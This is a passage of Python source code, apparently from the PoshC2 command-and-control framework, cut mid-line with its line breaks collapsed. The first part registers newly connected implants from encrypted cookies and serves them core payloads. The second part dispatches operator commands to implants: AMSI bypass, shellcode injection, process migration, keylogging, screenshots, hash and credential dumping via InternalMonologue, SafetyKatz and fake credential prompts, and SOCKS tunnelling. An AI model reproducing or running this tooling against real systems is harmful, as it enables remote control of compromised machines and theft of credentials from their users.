decCookie.split(";") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.SharpCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) elif implant_type.startswith("Python"): cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.PythonCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) else: try: cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.PSCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() s.send_response(404) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(bytes(HTTPResponse, "utf-8")) else: s.send_response(404) s.send_header("Content-type", "text/html") s.end_headers() HTTPResponsePage = select_item("HTTPResponse", "C2Server") if HTTPResponsePage: s.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: s.wfile.write(bytes(HTTPResponse, "utf-8"))
def handle_sharp_command(command, user, randomuri, startup, implant_id, commandloop): try: check_module_loaded("Stage2-Core.exe", randomuri, user) except Exception as e: print("Error loading Stage2-Core.exe: %s" % e) # alias mapping for alias in cs_alias: if alias[0] == command[:len(command.rstrip())]: command = alias[1] # alias replace for alias in cs_replace: if command.startswith(alias[0]): command = command.replace(alias[0], alias[1]) original_command = command command = command.strip() run_autoloads_sharp(command, randomuri, user) if command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = sharp_help1.split('\n') for line in helpful: if searchterm in line.lower(): print(Colours.GREEN + line) elif command == "quit": ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "" or ri.lower() == "y": new_c2_message("%s logged off." % user) sys.exit(0) elif command.startswith("upload-file"): source = "" destination = "" s = "" if command == "upload-file": style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.upload-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source except KeyboardInterrupt: commandloop(implant_id, user) while not os.path.isfile(source): print("File does not exist: %s" % source) source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source destination = session.prompt("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination try: with open(source, "rb") as source_file: s = source_file.read() if s: sourceb64 = base64.b64encode(s).decode("utf-8") destination = destination.replace("\\", "\\\\") print("") print("Uploading %s to %s" % (source, destination)) uploadcommand = "upload-file %s;\"%s\"" % (sourceb64, destination) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print("Error with source file: %s" % e) traceback.print_exc() elif command.startswith("unhide-implant"): unhide_implant(randomuri) elif command.startswith("hide-implant"): kill_implant(randomuri) elif command == "bypass-amsi": new_task("run-exe Core.Program Core bypass-amsi", user, randomuri) elif command.startswith("inject-shellcode"): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.shellcode-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter( PayloadsDirectory, glob="*.bin")) path = PayloadsDirectory + path except KeyboardInterrupt: commandloop(implant_id, user) try: shellcodefile = load_file(path) if shellcodefile is not None: new_task( "run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri) except Exception as e: print("Error loading file: %s" % e) elif command.startswith("migrate"): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) migrate(randomuri, user, params) elif command == "kill-implant" or command == "exit": impid = get_implantdetails(randomuri) ri = input( "Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri) elif command == "sharpsocks": from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurls = sharpurls.split(",") sharpurl = select_item("HostnameIP", "C2Server") print( POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input( "Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if ri == "": new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) if ri.lower() == "y": new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) elif (command.startswith("stop-keystrokes")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-keystrokes")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-screenshotmulti")): new_task(command, user, randomuri) elif (command.startswith("create-lnk")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("create-startuplnk")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-screenshot")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-hash")): check_module_loaded("InternalMonologue.exe", randomuri, user) new_task("run-exe InternalMonologue.Program InternalMonologue", user, randomuri) elif (command.startswith("arpscan")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("testadcredential")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("testlocalcredential")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("turtle")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-userinfo")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-computerinfo")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-dodgyprocesses")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-content")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("resolvednsname")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("resolveip")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("safetykatz")): new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri) elif (command.startswith("cred-popper")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-serviceperms")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("copy ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("move ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("delete ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif command == "ls": new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("ls ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif command == "pwd": new_task("run-exe Core.Program Core pwd", user, randomuri) elif command == "ps": new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri) elif command.startswith("loadmoduleforce"): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif command.startswith("loadmodule"): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif command.startswith("listmodules"): modules = os.listdir("%s/Modules/" % POSHDIR) print("") print("[+] Available modules:") print("") for mod in modules: if (".exe" in mod) or (".dll" in mod): print(mod) new_task(command, user, randomuri) elif command.startswith("modulesloaded"): ml = get_implantdetails(randomuri) print(ml[14]) elif command == "help" or command == "?": print(sharp_help1) elif command == "back" or command == "clear": startup(user) elif command.startswith("beacon") or command.startswith( "set-beacon") or command.startswith("setbeacon"): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print( "Invalid sleep command, please specify a time such as 50s, 10m or 1h" ) print(Colours.GREEN) else: new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) else: if command: new_task(original_command, user, randomuri) return